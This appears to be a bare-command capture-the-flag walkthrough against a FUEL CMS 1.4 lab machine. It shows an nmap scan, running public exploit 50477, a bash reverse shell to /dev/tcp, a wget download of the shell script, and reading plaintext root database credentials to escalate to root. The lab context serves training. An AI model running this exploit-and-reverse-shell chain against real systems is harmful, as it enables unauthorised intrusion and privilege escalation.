mkdir ignite
cd ignite
nmap -sV -sC -oA nmap_ignite 10.10.174.21
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry
|_/fuel/
📌 Found FUEL CMS v. 1.4 on port 80
searchsploit fuel cms
searchsploit -m 50477
less 50477.py
python 50477.py -u http://10.10.174.21
ip -br -c a
10.18.65.48 # my IP
subl shell.sh
# Insert this line for a bash reverse shell
/bin/bash -i >& /dev/tcp/10.18.65.48/3333 0>&1
python -m http.server
nc -nvlp 3333
wget http://10.18.65.48:8000/shell.sh -O shell.sh
bash shell.sh
/usr/bin/script -qc /bin/bash /dev/null
cd /home/www-data
ls
cat flag.txt
6470e***************************
cat /var/www/html/fuel/application/config/database.php
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
'dbprefix' => '',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '',
'char_set' => 'utf8',
'dbcollat' => 'utf8_general_ci',
'swap_pre' => '',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
'save_queries' => TRUE
);
📌 Found database credentials: root:mememe
su root
whoami
cd
cat root.txt
b9bbc**************************
